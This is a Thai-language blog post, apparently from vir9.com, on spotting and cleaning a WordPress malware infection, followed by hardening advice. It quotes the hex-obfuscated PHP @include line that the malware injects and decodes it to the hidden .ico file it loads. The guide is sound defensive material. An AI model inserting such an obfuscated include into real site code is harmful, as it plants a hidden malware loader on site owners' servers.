ประเภท: มัลแวร์
ข้อมูลประเภท : https://vir9.com/computer-internet/malicious/
ประเภท script เป้าหมาย : wordpress

การลบไม่ยาก แต่หากคุณไม่รู้หลักการทำงานของมัน มันจะกลับมาหาคุณอีก
ดังนั้นอ่านทั้งหมดนี่แล้วคุณจะแก้มันได้

อาการ

1. ส่วนบนของไฟล์จะถูกแทรก code ลักษณะนี้

@include "\x2fh\x6fm\x65/\x6ee\x77k\x65v\x69n\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fe\x64g\x65s\x74a\x72t\x65r\x2ec\x6fm\x2fw\x70-\x63o\x6et\x65n\x74/\x75p\x6co\x61d\x73/\x66a\x76i\x63o\x6e_\x38f\x667\x32f\x2ei\x63o";

code ถูกเข้ารหัสเพื่อปกปิดไม่ให้เห็นได้ง่าย ต้องถอดรหัส (ถอดรหัส ที่เว็บ https://malwaredecoder.com) จะรู้ตำแหน่งไฟล์ไวรัส และตามไปลบได้

@include "/home/newkevin/public_html/edgestarter.com/wp-content/uploads/favicon_8ff72f.ico";

ข้อสังเกตุ : ไฟล์บางครั้งจะมีจุดนำหน้าทำให้มองไม่เห็น ต้องตั้งค่า โปรแกรม FTP ให้มองเห็นได้ หรือ ถ้าเข้า Direct Admin (DA) จะมองเห็น

2. มีการสร้างไฟล์ขึ้นบน Host web ของเรา ไฟล์ชื่อแปลกๆ เพื่อให้ค้นหายากโดยโปรแกรม เช่น kpdjkjh.php ซึ่งค้นหายาก เพราะไม่มีูปแบบ และ สร้างไว้ใน path ต่างของเว็บไซต์ กระจายไปตาม Directory ต่างๆ เพื่อการันคีความอยู่รอดของ code ทำให้หมดลบยาก เพราะ ข้อเสียอย่างหนึ่งของ cms คือ มีไฟล์ และ folder เยอะมากมาย ยังไม่นับรวม พวก plugin ต่างๆที่ติดตั้งเพิ่มไปอีก

ผลกระทบ

เป็นลักษระเหมือนปรสิต ที่เกาะร่างกาย(เว็บ) โดยไม่ได้ให้ประโยชน์ใดๆ (ปรสิต กาฝากต้นไม้ แบคทีเรีย บางประเภทยังสร้างประโยชน์ให้ได้) ทำให้เว็บของคุณถูก search engin เช่น google แบน และ ถูก Deindex (เอาออกจากระบบค้นหา) เพราะอันตรายต่อผู้ใช้ อันดับเว็บคุณจะตก ขึ้นกับระยะเวลา ในที่สุดเว็บคุณก็จะหายไปจาก google และ ตายจากคุณไป (เพราะคุณไม่ดูแลมันยังไงละ) นั่นเป็นเหตุผลหนึ่ง ว่า ทำไม เว็บไซต์ คุณควรได้รับการดูแล ปกป้องเพื่อให้มันคงอยู่และพัฒนาให้ดีขึ้นเพื่อธุรกิจของคุณเอง

การทำงานของมัลแวร์

(จะเรียกไวรัสละกันนะ จะได้เข้าใจกันง่ายๆ ไม่ต้องไปสนใจ การเรียก)
แทรก code (ใน code นั้นเป็นการดึงไฟล์ไวรัส ทำงาน โดยใช้คำสั่ง include คือ เรียกไฟล์เข้ามา และถูกเข้ารหัสไว้) > ไฟล์ไวรัส > ส่งค่าบางอย่าง หรือทำอะไรบางอย่าง อาจส่งค่า cookie หรือ backlink ไป ที่เว็บปลายทาง (ต้องแกะโค๊ดจึงจะรู้)

มัลแวร์ เข้ามาได้อย่างไร

ถูกโจมตี ทาง ช่องโหว่ wordpress นี่เป็นเหตุผลว่าทำไม คุณถึงต้อง update wordpress ให้เร็วที่สุด โดยเฉพาะ การ update ในเรื่อง security ล่าสุุด 5/2018 version 4.9.6 มี 18bug เลยทีเดียว

สิ่งที่เราพบเพิ่มเติม ที่สำคัญ คือ ช่องโหว่ทาง plugin และ theme โดยบาง plugin ที่ติดตั้งนั้นมี รูปแบบการทำงานและ permission ไฟล์ ที่ไม่ปลอดภัย เช่น  script code ง่ายต่อการเจาะเข้าไป ,หลังการติดตั้ง folder เป็น 777 หรือ ไฟล์เป็น 755 แทนที่ Folder จะเป็น 755 และ ไฟล์ 644  ซึ่งเป็นมาตรฐาน ยกเว้น ประเภทการอัพโหลดต้อง 777

ดังนั้นการเลือก plugin ใช้ต้องดูที่มีชื่อเสียงคนใช้เยอะ และก็เป็นที่สนใจของเหล่าแฮกเกอร์ด้วยเช่นกัน

– plugin ถ้าไม่จำเป็นไม่ต้องใช้ ให้รวม code กับ Theme
-ใช้ plugin และ ธีมที่มีจำนวนและ folder ไฟล์น้อยที่สุด ไม่ซับซ้อน
– ธีมที่ไม่ใช้ให้ลบทิ้งทั้งหมด
– ธีมที่โหลดฟรีใน wordpress.org เองก็มีความเสี่ยงเช่นกัน แต่ก็น้อยกว่า โหลดตามแหล่งที่ไม่น่าเชื่อถืออื่นๆรวมถึง null Theme ที่แจกทั่วไป

มันทำงานเองหรือ ต้องสั่ง

มันถูกสั่งให้ทำงาน อาจเป็น manual หรือ ตั้งเวลาไว้ จากโปรแกรมภายนอก (มันรันเองไม่ได้)

วิธีแก้

หากเป็นปัญหาที่ตัว script cms เช่น wordpress

วิธี1

1.ลบ ไฟล์ทั้งหมด ของ wordpress
2.คงไว้เฉพาะ /wp-config.php และ /wp-content/ และ ค้นหาไฟล์ code และ ไฟล์แปลกปลอม
– ใน ไฟล์ /wp-config.php เทียบกับต้นฉบับล่าสุด
– ใน folder /wp-content/ จะมีการเก็บ Theme,plugin
– ลบ plugin ทั้งหมด (ค่อยไปลงใหม่) เพราะมันจะแทรกไวรัสมาในนี้ด้วย
– ตรวจสอบไฟล์ ใน Theme ถ้าธีมใครไฟล์เยอะก็ตรวจสอบกันนานหน่อย หรือ หากมีต้นฉบับก็เอามาลงแทน
– ใน folder /wp-content/ มีไฟล์สำคัญคือ รูปภาพ (ตรวจสอบ Folder ในนั้นด้วย)
3. เอา wordpress ตัวใหม่มาทับ แล้วเข้าเว็บตามปกติ ถ้าเข้าได้ก็จบ

วิธี2

ลบแล้วลงใหม่

หากเป็นปัญหาที่ตัว hosting

เช่น ผู้ให้บริการที่ไม่มีความเชี่ยวชาญ ก็ต้องเปลียนย้าย
นี่หมายถึงว่า แน่ใจแล้วว่า ไม่ได้เกิดจากผู้ใช้งานเอง ซึ่งก็มีวิธีการพิสูจน์หลายวิธี

เช่นอาจลงเว็บใหม่ หรือ ให้ผู้บริการลงให้ โดยที่เราไม่ได้ไปมีส่วนตรงนั้น เเละเมื่อยังมีไวรัสเข้ามาได้แสดงว่าไม่ใช่เกิดจากตัวผู้ใช้ จะเกิดได้อย่างไรก็จะเป็นเรื่องของ hosting หรือ cms ที่ใช้ มีแค่ 2 อย่าง

วิธีหยุดการแทรกและสร้างไฟล์ของไวรัส

1. แฮกเกอร์มักจะส่งคำสั่งเข้ามาจากต่างประเทศ จึงควร Block ip จากต่างประเทศทั้งหมดไปก่อน
2. หากพบมีการเพิ่ม code เข้ามาใน files ไฟล์ ให้ไปตรวจสอบ เวลาและวันที่ ใน DA
3. เอาเวลาและวันที่ ไปค้นหาใน log files จะรู้ ip และ ไฟล์ไวรัสที่ถูกรัน
4. ให้เปลี่ยนเป็น block ประเทศนั้นแทน block ทั้งหมด (ถ้าเว็บคุณจำเป็นต้องมีการเผยแพร่หรือใช้งานในต่างประเทศ)
5. clear ไวรัสอีกครั้ง ให้ทำอย่างนี้ไปเรื่อยๆ จนปัญหาจบ

ข้อสังเกตุสำคัญ

CMS wordpress ได้รับความนิยม กว่าครึ่งหนึ่งของผู้ใช้ทั้งหมดทั่วโลก จึงเป็นเป้าหมายของเหล่าแฮกเกอร์ เพราะมี website ให้โจมตีหาประโยชน์ได้เยอะมากมาย และนั่นทำให้ ทีมผู้พัฒนาก็ต้องอัพเดท version เพื่อแก้ bug หรือ ช่องโหว่ต่างๆเป็นระยะๆ ซึ่งคงต้องเป็นอย่างนี้ไปเรื่อยๆ

และยิ่งหากเว็บของคุณมี traffic สูงคนเข้าชมมาก หรือ เป็นเว็บดัง หรือ เป็นเว็บที่มีข้อมูลสำคัญ ก็ยิ่งต้องเสี่ยงมากขึ้นอีกหลายเท่าตัว นี่เป็นเหตุผลว่า ทำไมเว็บใหญ่ๆ ดังๆหลายแห่งจึงต้องพัฒนา engine ที่ใช้กับเว็บไซต์ด้วยตัวเอง ไม่ใช้ของฟรี (แฮกเกอ์ก็โหลดไปลองไปหาช่องโหว่ได้ เพราะเป็น open seource แล้วอย่างนี้จะกันได้อย่างไร?)

เมื่อวันหนึ่งข้างหน้าธุรกิจของคุณเติบโตขึ้น ปัจจัยเสี่ยงย่อมสูงขึ้นเป็นเงาตามตัว ของใช้บางอย่างอาจไม่เหมาะกับคุณอีกต่อไปแล้ว เมื่อก่อนคุณใช้รถตลาดทั่วไป แต่ถ้าซื้อรถยุโรปสิ่งที่จะได้เพิ่มมาแน่นอนคือ ความแข็งแกร่งของโครงสร้างรถ คุณภาพของสินค้า ความทนทาน ระบบความปลอดภัย ระบบการขับเคลื่อน ฯลณ ความปลอดภัยในชีวิตและทรัพย์สิน จึงเป็นเรื่องสำคัญที่สุด การยอมรับความเสี่ยงได้หรือไม่? เพียงใด? มีทางอื่นที่ดีกว่าไหม? คุ้มค่ากว่ากันหรือไม่? คุณเท่านั้นที่จะเป็นผู้เลือก ผลจากนี้ไปในวันข้างหน้า ก็เกิดจากการตัดสินใจของคุณในวันนี้

เครื่องมือที่ต้องใช้

1. เว็บ scan malware online (ไม่สามารถ scan ได้สะอาด 100% จึงควรใช้หลายๆ)
2. โปรแกรมค้นหาไฟล์ อาจเป็นโปรแกรมติดตั้งในเครืองโดยเฉพาะ หรือ โปรแกรม FTP ก็มีฟังก์ชั่นนี้ เช่น WINSCP
3. โปรแกรม ค้นหา text ใน ไฟล์ (scan malware online ใช้หลักการดังกล่าว)

ของฝรั่งเขาก็มีึคนเขียนวิธีไว้
https://securepress.org/tutorial-how-to-remove-malware.php
http://www.wpbeginner.com/beginners-guide/beginners-step-step-guide-fixing-hacked-wordpress-site/
https://www.optimizesmart.com/malware-removal-checklist-for-wordpress-diy-security-guide/
https://sucuri.net/guides/how-to-clean-hacked-wordpress

วิธีป้องกัน

เราจะไม่พูดถึง ปัจจัยเสี่ยงอื่นๆ เช่น เครื่องคอม โปรแกรม ftp การอัพไฟล์ที่ติดไวรัส การไม่อัพเวอร์ชั่น การใช้ปลักอินไม่ปลอดภัย ใช้ธีมที่ไม่ปลอดภัย ฯลฯ เพราะสิ่งเหล่านี้ ควบคุมได้ยากขึ้นอยู่การใช้งานแต่ละคน

เราจะพูดถึงเพียง2เรื่อง

1. Script CMS ตัวเว็บ

ต้องใช้ script ที่มีคุณภาพมากขึ้น หรือ เขียนด้วยภาษาที่ปลอดภัยมากขึ้น อาจจะไปใช้ CMS ที่ไม่ฟรี อาจจะมีค่าบริการ หรือ พัฒนาขึ้นมาเอง (เขียนเอง,จ้างเขียน)

2. Hosting

ใช้ hosting ที่มีระบบการป้องกันการโจมตี โดยเฉพาะ กับ wordpress และบางเจ้ามีการแก้ปัญหาไวรัสหรือรับประกันกรณีดังกล่าวให้ด้วย หรือ โฮสต์ที่มีผู้เชียวชาญปัญหาไวรัส การถูกแฮก และให้การช่วยเหลือ อย่างน้อยก็ช่วย scan หาปัญหา

วิธีป้องกันที่สามารทำได้เลย

สำหรับ wordpress
– Modify ให้ต่างไปจาก ต้นฉบับ เช่น ซ่อน version ไว้ เพราะ แฮกเกอร์อาจใช้การ scan version เพื่อทราบได้ว่า เว็บไหนยังไม่ได้อัพเดท และมี ช่องโหว่อยู่ ซึ่งก็สามารถแฮกได้ง่ายดายมากมีข้อมูลเปิดเผยช่องโหว่ให้ได้ศึกษา แม้แต่คุณก็ทำได้
– อาจใช้ปลํักอินต่างๆป้องกัน แต่ก็นั้นเเหละ ถ้าไม่ได้ถูกทดสอบก็บอกไม่ได้ว่าดีหรือไม่ ที่สำคัญคือ  plugin ดังๆ พวกแฮกเกอร์ก็โหลดไปวิเคราะห์การทำงาน คุณจึงอาจจำเป็นต้องซื้อออฟชั่นเพิ่มก็อาจจะป้องกันได้ดีขึ้น

สำหรับเคสที่ติดไวรัสไปเเล้วบางครั้งก็แก้ไม่ได้ง่าย แต่อาจมีประโยชน์ในการช่วย scan ได้ส่วนมาก แต่อาจหลงเหลือยู่
– ลดความเสี่ยง โดย ไม่จำเป็นอย่าใช้ plugin นอกจากจะทำให้เว็บช้าแล้วยังเสี่ยงต่อการถูกแฮกเข้ามาทาง plugin
– theme และ plugin ที่ไม่ได้ใช้ให้ลบ
–  คุณต้องอัพเดทเสมอ และ คอยมอร์นิเตอร์เว็บไซต์ของคุณ
– อาจเขียน script บางอย่างเพื่อตรวจสอบ หรือ ช่วยเหลือคุณเพิ่ม เช่นเมื่อไฟล์ถูกเปลี่ยน จะมีอีเมลเเจ้งเตือน (อันนี้เด็ด)